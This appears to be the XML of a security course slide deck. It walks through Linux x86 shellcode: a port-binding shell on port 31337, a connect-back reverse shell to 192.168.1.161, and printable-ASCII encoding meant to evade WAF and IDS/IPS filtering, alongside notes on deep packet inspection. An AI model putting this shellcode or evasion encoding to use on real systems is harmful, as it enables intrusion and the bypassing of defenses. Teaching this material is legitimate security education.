                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21501" y="7208"/>
                  <a:pt x="26749" y="4489"/>
                  <a:pt x="28077" y="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lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="394" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3926978" y="4477125"/>
            <a:ext cx="398400" cy="193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4" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325378" y="6032775"/>
            <a:ext cx="4809300" cy="76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This sets up:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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socket(2,1,0) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disassembly view recap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01" name="Shape 401"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="402" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3718187" y="3879575"/>
            <a:ext cx="1973100" cy="9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x="5691287" y="3120725"/>
            <a:ext cx="3196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 DWORD PTR [esp+8], 0x0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 DWORD PTR [esp+4], 0x1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 DWORD PTR [esp], 0x2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  0x8048394 &lt;socket@plt&gt;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127625" y="4277950"/>
            <a:ext cx="25230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Arguments are pushed on the stack in reverse order,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so PF_INET = 2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and SOCK_STREAM = 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Piece by piece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4572000" y="1603050"/>
            <a:ext cx="44772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457200" y="1447800"/>
            <a:ext cx="41034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325378" y="6032775"/>
            <a:ext cx="4809300" cy="76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This sets up:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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sockaddr_in host_addr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198438"/>
            <a:ext cx="2601900" cy="1385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(TCP)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Stateful </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>packet inspection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19263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drop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packets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violating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TCP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state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machine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901" y="101600"/>
            <a:ext cx="6335065" cy="669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bind(s, [2, 31337, 0], 16)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Debugger view recap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18" name="Shape 418"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1024425" y="2684375"/>
            <a:ext cx="4230600" cy="27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25" y="1651100"/>
            <a:ext cx="76866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5097723" y="2949975"/>
            <a:ext cx="39936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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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    char             sin_zero[8];  // zero this if you want to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent6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Piece by piece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4572000" y="1603050"/>
            <a:ext cx="44772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457200" y="1447800"/>
            <a:ext cx="41034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4325378" y="6032775"/>
            <a:ext cx="4809300" cy="76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This sets up:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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listen(sockfd, 4);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Piece by piece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4572000" y="1603050"/>
            <a:ext cx="44772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457200" y="1447800"/>
            <a:ext cx="41034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4325378" y="6032775"/>
            <a:ext cx="4809300" cy="76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This sets up:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill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new_sockfd = accept(sockfd, (struct sockaddr *)&amp;client_addr, &amp;sin_size);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shellcode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binds to port 31337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waits for incoming connections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blocking at the accept call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When connection is accepted the new socket file descriptor is stored in EAX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but doesn't do anything more!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we need to tie the file descriptor with a shell eventually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cue talk on: dup2()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 dup2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DUP(2)                     Linux Programmer's Manual                    DUP(2)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dup, dup2, dup3 - duplicate a file descriptor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SYNOPSIS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#include &lt;unistd.h&gt;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int dup(int oldfd);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int dup2(int oldfd, int newfd);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#define _GNU_SOURCE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#include &lt;unistd.h&gt;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int dup3(int oldfd, int newfd, int flags);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DESCRIPTION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These system calls create a copy of the file descriptor oldfd.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dup()  uses  the lowest-numbered unused descriptor for the new descrip‐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tor.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   dup2() makes newfd be the copy of oldfd, closing newfd first if  neces‐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   sary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shell-spawning port binding shellcode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457200" y="1600200"/>
            <a:ext cx="4113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.... same as before   .......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4570200" y="1600200"/>
            <a:ext cx="44829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eax      ; move socket FD in ebx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BYTE 0x3F    ; dup2  syscall #63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xor ecx, ecx      ; ecx = 0 = standard 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1 = standard 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2 = standard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execve(const char *filename, char *const argv [], char *const envp[])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11   ; execve  syscall #11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edx          ; push some nulls for string termination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0x68732f2f   ; push "//sh" to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0x6e69622f   ; push "/bin" to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esp      ; put the address of "/bin//sh" into ebx, via esp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edx          ; push 32-bit null terminator to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edx, esp      ; this is an empty array for envp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ebx          ; push string addr to stack above null terminator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ecx, esp      ; this is the argv array with string ptr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execve("/bin//sh", ["/bin//sh", NULL], [NULL])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result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57200" y="1600200"/>
            <a:ext cx="41034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The added code duplicates this socket into the standard I/O file descriptors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/>
              <a:t>0 = standard in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/>
              <a:t>1 = standard out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/>
              <a:t>2 = standard error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So when connections are accepted, these file descriptors are created, to handle /bin/sh for the socket.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can only handle one connection, then closes.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This is messy!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Lots of dup2 calls on the right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/>
              <a:t>we need to clean this up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-3175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1400"/>
              <a:t>Branching control structures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4570200" y="1600200"/>
            <a:ext cx="44829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eax      ; move socket FD in ebx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BYTE 0x3F    ; dup2  syscall #63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xor ecx, ecx      ; ecx = 0 = standard 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1 = standard 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2 = standard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execve(const char *filename, char *const argv [], char *const envp[])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11   ; execve  syscall #11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edx          ; push some nulls for string termination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0x68732f2f   ; push "//sh" to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0x6e69622f   ; push "/bin" to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esp      ; put the address of "/bin//sh" into ebx, via esp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edx          ; push 32-bit null terminator to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edx, esp      ; this is an empty array for envp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ebx          ; push string addr to stack above null terminator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ecx, esp      ; this is the argv array with string ptr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execve("/bin//sh", ["/bin//sh", NULL], [NULL])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Branching Control Structures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 programming structures like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for loops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if-then-else blocks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while loops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Rewritten as a small loop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457200" y="1600200"/>
            <a:ext cx="4113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eax      ; move socket FD in ebx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BYTE 0x3F    ; dup2  syscall #63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xor ecx, ecx      ; ecx = 0 = standard input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0)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1 = standard output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1)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2 = standard error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4570200" y="1600200"/>
            <a:ext cx="45588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xchg eax, ebx     ; put socket FD in ebx and 0x00000005 in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BYTE 0x2     ; ecx starts at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pop ecx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dup_loop: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dup2(c,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dec ecx           ; count down to 0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jns dup_loop      ; if the sign flag is not set, ecx is not negative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3651900" y="4723775"/>
            <a:ext cx="44109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Cuts down on some size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important note:  xchg swaps &lt;reg1&gt; and &lt;reg2&gt; using EBX as the pivot/swap-register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Going from port binding to connect back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457200" y="1600200"/>
            <a:ext cx="4056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Port binding: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setup socket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bind to socket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listen for connections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accept connections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handle standard file I/O descriptors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spawn shell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4630800" y="1600200"/>
            <a:ext cx="4056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back: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setup socket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Connect back to attacker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handle standard file I/O descriptors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spawn shell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==smaller shellcode!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IDS / IPS Deep Packet Inspection (DPI)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 u="sng"/>
              <a:t>Deep Packet Inspection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>search packet data + IP + TCP/UDP headers for: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protocol noncompliance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viruses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spam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intrusions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>commonly used by: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enterprise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ISP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govts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Allows for: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eavesdropping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data mining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>censorship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DPI on its own, combines the functionality of IDS/IPS &amp; a traditional stateful firewall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227279" y="3761825"/>
            <a:ext cx="2047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See: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http://en.wikipedia.org/wiki/Deep_packet_inspection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change this to connect back?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Only involves changing two lines of the ASM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seriously!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.... seriously!!!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 the bind() block of ASM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and removing listen() and accept()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 remove two blocks of ASM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connect back shellcode </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(targets 192.168.1.161)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457200" y="1417650"/>
            <a:ext cx="41604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; connect(s, [2, 31337, &lt;IP ADDR&gt;], 16)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xor ebx, ebx;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push DWORD 0xa101a8c0 ; hex representation for 192.168.1.161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inc ebx	    ; ebx = 3 = SYS_CONNECT = connect()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4792700" y="1600200"/>
            <a:ext cx="41604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;success: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xchg esi, ebx     ; put socket FD from esi into ebx (esi = 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xchg ecx, esi     ; ecx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dec ecx           ; ecx starts at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dup_loop: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int 0x80          ; dup2(c,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dec ecx           ; count down to 0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jns dup_loop      ; if the sign flag is not set, ecx is not negative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 execve(const char *filename, char *const argv [], char *const envp[])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BYTE al, 11   ; execve  syscall #11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push some nulls for string termination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0x68732f2f   ; push "//sh" to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0x6e69622f   ; push "/bin" to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ebx, esp      ; put the address of "/bin//sh" into ebx, via esp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edx          ; push 32-bit null terminator to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edx, esp      ; this is an empty array for envp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push ebx          ; push string addr to stack above null terminator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mov ecx, esp      ; this is the argv array with string ptr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int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2157751"/>
            <a:ext cx="77724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Encoded shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 502"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3953037"/>
            <a:ext cx="7772400" cy="125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Bypassing WAF ASCII filters &amp; IDS/IPS detection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attack something thats behind a WAF, IDS / IPS, AND Firewall?????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regulations mandate (in many industries) the companies either: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 regular code auditing of their software to get rid of bugs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establish a WAF, IDS / IPS instead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still will be vulnerabilities!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its like sweeping them under the rug!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 if its behind a WAF, its likely not code audited.... vulnerabilities ++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time! Italian potato governor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There was once a italian governor that wanted to introduce potatoes to the daily lives of his citizens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they were cheap and easy to grow.  Good for business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Italians didn't want any part of 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Even gave them away for free!!! No one wanted them....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So he played on human logic..... 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586" y="5068960"/>
            <a:ext cx="2694414" cy="178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(Not-so) Great Potato Heists!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gov put guards around carts of potatoes in the marketplace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people collectively began to think, well if they're being guarded they must be worth something!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 when the guards took their breaks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people began stealing potatoes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and raving about them "Man these things are great!"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Lesson here:  Putting defenses up may naturally drive more people to attack it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	-which is the motivation for honeypots :D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Buffer restrictions on a web application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Often caused by a WAF filter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Usually filter for data types other than expected (data sanity checking)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ASCII only input for string buffers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numerical only input for integers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etc...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Prevents many vulnerabilities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Polymorphic printable ASCII shellcode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Polymorphic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refers to any code that modifies itself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we've worked with this some already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 need NOP sleds that are printable ASCII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We need ways to zero out registers with printable ASCII opcodes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And encoders / decoders that are printable ASCII as well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ASCII range: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0x33 to 0x7e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0x33 to 0x7e</a:t>
            </a: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total set of valid opcodes here is rather small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would be insane to write complex shellcode using a small instruction set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instead we find some way such that the printable opcodes modify the rest of the shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469500" y="5169575"/>
            <a:ext cx="8205000" cy="559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ASCII NOP sled			ASCII Shellcode Decoder  			Encoded ASCII shellcode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2447250" y="5179075"/>
            <a:ext cx="0" cy="5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2" name="Shape 542"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5571450" y="5179075"/>
            <a:ext cx="0" cy="5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3" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979875" y="4628530"/>
            <a:ext cx="1005450" cy="550550"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="22022" w="40218">
                <a:moveTo>
                  <a:pt x="0" y="22022"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3414" y="18354"/>
                  <a:pt x="13786" y="142"/>
                  <a:pt x="20489" y="16"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27192" y="-110"/>
                  <a:pt x="36929" y="17721"/>
                  <a:pt x="40218" y="21263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dot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0x33 to 0x7e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Useful stuff that renders as printable ascii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push esp 		; prints as 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pop eax		; prints as X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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"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sub eax, 0x41414141	; prints as "-AAAA"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push eax		; prints as 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pop esp		; prints as \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eax, 0x454e4f4a	; prints as "%JONE"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eax, 0x3a313035	; prints as "%501:"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and eax, 0x41414141	; prints as "%AAAA"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DPI easily defeated by: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Compression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Encoding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Encryption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tunneling (sometimes)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Zeroing out registers</a:t>
            </a:r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1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>and eax, 0x454e4f4a	; prints as "%JONE"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and eax, 0x3a313035	; prints as "%501:"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and eax, 0x41414141	; prints as "%AAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Instructions like these can be used to zero out a register, if the value's being AND-ed are inverses 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share no 1's in common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01  AND 10 == 00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0x45e4f4a   AND    0x3a313035 == 0x000000!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"%JONE%501:" will zero out EAX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Then....</a:t>
            </a:r>
          </a:p>
        </p:txBody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two ways to proceed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these crazy opcodes to build shellcode on the stack from scratch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these opcodes to *decode* the rest of the payload...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shell spawning shellcode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#2 conceptually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480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We have useful instructions like these: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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"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sub eax, 0x41414141	; prints as "-AAAA"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What we do with our shellcode, is take the raw bytes, and increment them by some combination of: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0x39393333, 0x72727550, 0x54545421, 0x41414141 and so on, until they are in the "printable" ASCII range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#2 conceptually</a:t>
            </a:r>
          </a:p>
        </p:txBody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Then, once everything is in the printable ascii range, it will bypass any ASCII filter (i.e. on the WAF).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Then use these instructions to *decode* the encoded payload!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sub eax, 0x39393333 	; prints as "-3399"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sub eax, 0x72727550	; prints as "-Purr"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sub eax, 0x54545421	; prints as "-!TTT"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sub eax, 0x41414141	; prints as "-AAAA"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we get shellcode like:</a:t>
            </a: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simple shell-spawning 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Networking shellcode gets really tricky here.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64" y="2277566"/>
            <a:ext cx="8580685" cy="92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600" y="5005800"/>
            <a:ext cx="16002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need to know</a:t>
            </a:r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 this works conceptually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that there are tools out there that automate this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msfencode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its more of an art than a science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1606588"/>
            <a:ext cx="759142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Primarily focused on identifying *possible* incidents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log info about them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reporting all attempts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Secondary uses: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identifying problems with security policies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Documenting existing threats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deterring insider threats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Same as IDS but will kill traffic when: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when threats are detected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when policies are violated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like a firewall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